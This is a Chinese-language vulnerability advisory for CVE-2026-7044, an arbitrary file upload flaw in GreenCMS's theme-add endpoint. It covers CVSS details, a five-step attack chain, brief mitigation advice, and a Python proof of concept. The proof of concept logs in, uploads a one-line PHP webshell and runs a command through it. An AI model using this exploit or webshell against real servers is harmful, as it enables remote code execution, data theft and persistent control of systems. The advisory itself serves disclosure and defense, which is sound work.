CVE-2026-7044 CVSS 6.3 中危

CVE-2026-7044 GreenCMS任意文件上传漏洞

披露日期: 2026-04-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7044

漏洞类型

任意文件上传

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GreenCMS

漏洞概述

GreenCMS内容管理系统在2.3及之前版本中存在严重安全漏洞。问题出在`/index.php?m=admin&c=custom&a=themeadd`接口的`themeadd`函数，由于未对上传文件进行严格限制，导致存在任意文件上传风险。鉴于该软件已停止维护，攻击者可远程利用此漏洞上传恶意文件，可能导致服务器被完全控制。

技术细节

该漏洞源于GreenCMS后台管理模块中的主题添加功能（`themeadd`函数）。在处理用户通过`/index.php?m=admin&c=custom&a=themeadd`提交的文件上传请求时，服务器端代码未能正确验证上传文件的类型、后缀名及文件内容。攻击者利用此缺陷，可以构造恶意HTTP请求，绕过简单的前端限制，直接向服务器上传Webshell（例如包含恶意代码的PHP脚本）。由于上传目录通常具有可写权限且文件可能被Web服务器解析，攻击者成功上传后，只需通过浏览器访问上传文件的URL，即可在服务器端执行任意系统命令，从而窃取数据或控制服务器。鉴于该产品已停止维护，此漏洞无法通过官方升级修复。

攻击链分析

STEP 1

侦察

攻击者识别出目标服务器运行的是GreenCMS 2.3或更早版本。

STEP 2

获取权限

攻击者通过弱口令或其他方式获取一个低权限的普通用户账号，满足PR:L的要求。

STEP 3

漏洞利用

攻击者构造包含恶意PHP代码的文件，向`/index.php?m=admin&c=custom&a=themeadd`接口发送上传请求。

STEP 4

代码执行

文件上传成功后，攻击者通过浏览器访问该文件的URL，触发服务器端解析并执行恶意代码。

STEP 5

维持控制

攻击者利用Webshell进一步提权，安装后门或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/index.php?m=admin&c=custom&a=themeadd"
login_url = "http://example.com/index.php?m=admin&c=login&a=login"
shell_url = "http://example.com/uploads/shell.php"

# Login credentials (need low privileges)
credentials = {
    "username": "admin",
    "password": "password"
}

# Create a session
session = requests.Session()

# 1. Login to get privileges
login_response = session.post(login_url, data=credentials)
if "success" not in login_response.text:
    print("Login failed")
    exit()

# 2. Prepare the malicious file (PHP shell)
files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream')
}

# 3. Upload the file
upload_response = session.post(target_url, files=files)

if upload_response.status_code == 200:
    print("File uploaded successfully.")
    # 4. Verify the shell
    verify = session.get(shell_url + "?cmd=whoami")
    if verify.status_code == 200:
        print(f"Shell active! Current user: {verify.text}")
else:
    print("Upload failed")

影响范围

GreenCMS <= 2.3

防御指南

临时缓解措施

由于GreenCMS已停止维护且无官方补丁，建议立即限制Web服务器对上传目录的执行权限（如Nginx配置location禁止php解析），或通过WAF规则拦截针对该接口的上传操作，并尽快规划迁移至其他CMS系统。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7044
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7044
3 Details https://www.cvedetails.com/cve/CVE-2026-7044/
4 VulDB https://vuldb.com/cve/CVE-2026-7044
5 Link https://github.com/ueh1013/VULN/issues/21
6 Link https://vuldb.com/submit/798530
7 Link https://vuldb.com/vuln/359623
8 Link https://vuldb.com/vuln/359623/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表